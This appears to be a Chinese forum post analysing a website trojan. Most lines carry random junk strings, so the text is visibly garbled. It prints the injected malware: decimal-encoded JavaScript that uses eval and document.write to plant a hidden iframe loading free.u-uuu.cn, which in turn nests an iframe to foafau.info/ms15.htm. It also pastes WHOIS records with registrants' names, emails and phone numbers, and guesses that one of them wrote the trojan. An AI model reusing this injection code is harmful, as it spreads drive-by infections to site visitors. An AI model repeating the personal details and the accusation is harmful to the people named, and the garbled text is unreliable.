[原创]一篇刚写的分析木马手记

首发在我的博客里面， j?.F-a
r  
1VX3pkUET  
http://www.areway.cn/?p=175 6ZQ |L=Ytp  
QQ3<)i  
>j5\J_(;D  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： m+Ye`]  
          +FTc/r  
<script>t=’60,105,102,114,97,109,101, "Lbsq\W>  
32,115,114,99,61,104,116,116,112,58,47,47, q3$8"Q^  
102,114,101,101,46,117,45,117,117,117,46,99, [A-_?#cZ  
110,47,101,114,114,111,114,46,104,116,109, 03 @aG  
32,119,105,100,116,104,61,49,48,48,32,104, 5CkG^9  
101,105,103,104,116,61,48,62,60,47,105,102, K~ eak\=  
114,97,109,101,62′; D|LO!,=b  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> y7,fFUKl  
                                                                                                  p&<Ssc  
<script>t=’60,105,102,114,97,109,101,32,115, 
U6]#RxH  
114,99,61,104,116,116,112,58,47,47,102,114, ;t&q|}x"  
101,101,46,117,45,117,117,117,46,99,110,47, Ia&*JYM[  
101,114,114,111,114,46,104,116,109,32,119, n$/|r  
105,100,116,104,61,49,48,48,32,104,101,105, F(G..XJQ  
103,104,116,61,48,62,60,47,105,102,114,97, 0WUBj:@g  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); k)p`x"To  
document.write(t);</script> B@,r8)D  
                                                                                                  .q@?sdGD  
<html xmlns=” &BVH
Q7[  
http://www.w3.org/1999/xhtml Lzh8-d=HQ  
“> xE1?)  
<head> bwsKdh  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> uk):z$x
 
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> HbKE;N  
<title>首页 - 爱生活家庭网 +MoUh'/u  
                                                                                                                                                    hhTtxC<:  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 nh} Xu~#_  
转换字符串后的大概内容是（谁点击后果自付）： TjW!-s?S  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… `fBQ?[05.  
                                                                                                                                  f@OH~4FG  
查询玉米u-uuu.cn的详细信息： ;,4*uU'vq  
Domain Name: u-uuu.cn }%< ?]  
ROID: 20070901s10001s64972306-cn Dp'urf\*$  
Domain Status: ok uC'-: t#  
Registrant Organization: 王雷 Ln&pe(c  
Registrant Name: 王雷 D#g-mqar:  
Administrative Email: czlovexs@126.com E'QAsU8pP  
Sponsoring Registrar: 北京万网志成科技有限公司 -+".ut:R  
Name Server:ns.yovole.com I\@r~]+y  
Name Server:ns1.yovole.com *QC6zJ  
Registration Date: 2007-09-01 17:54 xVxs~p1  
Expiration Date: 2008-09-01 17:54 mxv?PP  
最后PING了一下地址 都没有什么…. 3<xE_ \DR  
                                                                                                n ay\)  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. uF7vba$  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> ZbFD|~[ V  
<script language=”javascript” src=” TDh)}Ms  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script F&Md+2  
> m}]{Y'i]R  
这个玉米应该有可能是木马作者的： N1t4o~  
foafau.info的详细信息： V}E['fzBFV  
Access to INFO WHOIS information is provided to assist persons in "#d$$ 8  
determining the contents of a domain name registration record in the &[ })FI  
Afilias registry database. The data in this record is provided by
Hg#tSE  
Afilias Limited for informational purposes only, and Afilias does not ~;"eNg{T  
guarantee its accuracy.  This service is intended only for query-based aHhLz>H'  
access. You agree that you will use this data only for lawful purposes  ?8>a;0  
and that, under no circumstances will you use this data to: (a) allow, =E-x0sr?  
enable, or otherwise support the transmission by e-mail, telephone, or V3,C5KKk&z  
facsimile of mass unsolicited, commercial advertising or solicitations r:QLU]   
to entities other than the data recipient’s own existing customers; or FnGKt\  
(b) enable high volume, automated, electronic processes that send r_7%|T8  
queries or data to the systems of Registry Operator, a Registrar, or 
&CG94  
Afilias except as reasonably necessary to register domain names or )."ob=m  
modify existing registrations. All rights reserved. Afilias reserves ^twyy9VR  
the right to modify these terms at any time. By submitting this query, IFLphm
5  
you agree to abide by this policy. x\yM|WGL  
Domain ID:D22418703-LRMS ;}B=g/C  
Domain Name:FOAFAU.INFO WBjJ)vCA.  
Created On:20-Nov-2007 16:05:42 UTC '(]Wtx%9"  
Last Updated On:20-Nov-2007 16:05:44 UTC <J8c dB!e  
Expiration Date:20-Nov-2008 16:05:42 UTC ]
[ $UN  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) &9e  
Status:CLIENT DELETE PROHIBITED &8VH m?h  
Status:CLIENT RENEW PROHIBITED {z oGwB  
Status:CLIENT TRANSFER PROHIBITED _S_,rTf&  
Status:CLIENT UPDATE PROHIBITED >N^<Q4%2  
Status:TRANSFER PROHIBITED @]Q4K%1^"  
Registrant ID:GODA-040110615 |!oC7!+0^  
Registrant Name:liu hong XT^=v6^H  
Registrant Organization: X}#vt?mu  
Registrant Street1:beijing B)q}]Qn  
Registrant Street2: o[;P@F  
Registrant Street3: >MYxj}I4{z  
Registrant City:beijing AD   
Registrant State/Province: rfDGS%!O%  
Registrant Postal Code:100000 MR
 "f)  
Registrant Country:CN AQ-PHv  
Registrant Phone:+86.860108888777 WsTIdr36x  
Registrant Phone Ext.: Q<>u)%92@  
Registrant FAX: @3n!5XM{EE  
Registrant FAX Ext.: bK "I9T #  
Registrant Email:bbbshiji@163.com Od.@G~  
Admin ID:GODA-240110615 oyVT  
Admin Name:liu hong qkfof{z  
Admin Organization: $NCvF'  
Admin Street1:beijing bWL!=  
Admin Street2: Gza=
 0  
Admin Street3: \BBs;z[/  
Admin City:beijing qiOtbH=  
Admin State/Province: [Or1  
Admin Postal Code:100000 %:
C6\4  
Admin Country:CN 9@1n:X  
Admin Phone:+86.860108888777 .*NPoW4Kv  
Admin Phone Ext.: J@_M%eN  
Admin FAX: +.djC
3^:  
Admin FAX Ext.: k3&68+  
Admin Email:bbbshiji@163.com 5k
qI  
Billing ID:GODA-340110615 2Ys=/mh  
Billing Name:liu hong pg5W`
4-F  
Billing Organization: 5CnNp?.t^  
Billing Street1:beijing l&\y]ZV={  
Billing Street2: T6y~iNd<  
Billing Street3: [( xPX  
Billing City:beijing +PPQ"#1pS  
Billing State/Province: z*HM_u  
Billing Postal Code:100000 _"*vj-{-y  
Billing Country:CN UR'v;V&Cb\  
Billing Phone:+86.860108888777 g)f& mQ)  
Billing Phone Ext.: R?{_Q<17  
Billing FAX: NvzPZ9=@-  
Billing FAX Ext.: i^WY/ OhL  
Billing Email:bbbshiji@163.com b4:{PD~Mh  
Tech ID:GODA-140110615 )fo0YpE^|  
Tech Name:liu hong WBKf)A^S  
Tech Organization: R|@~<*  
Tech Street1:beijing idHI)6!  
Tech Street2: o5/BE`VD5c  
Tech Street3: Z<<=2Xl(  
Tech City:beijing = y^5PjN  
Tech State/Province: o(}%b8 K  
Tech Postal Code:100000 C D6N8n]  
Tech Country:CN z,ryY'ua/I  
Tech Phone:+86.860108888777 1N65 M=)  
Tech Phone Ext.: F<h+d917  
Tech FAX: xi"ff.  
Tech FAX Ext.: Q~.t8g/  
Tech Email:bbbshiji@163.com {zd[8TJ~xa  
Name Server:NS27.DOMAINCONTROL.COM ,e|"p[z~T  
Name Server:NS28.DOMAINCONTROL.COM }e|cszNRd  
Name Server: XR VZU~ZV  
Name Server: FD!8
o  
Name Server: 7Wv.-LD6  
Name Server: E el*P M  
Name Server: S~r75] "  
Name Server: d<Lc&wlP  
Name Server: R68:=E4  
Name Server: l(x0d  
Name Server:
ObZhQ.&  
Name Server: @}PXBU   
Name Server: %yc-D]P/  
                                                                                                          34CcZEQQ  
接着下载每个文件里面的代码： H9'psv  
一步一步看.. ;t9!<L  
Q"NZE  
67/\0mV:~  
<!G\%C  
2oc18#iG(  
JXRU9`3)A  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来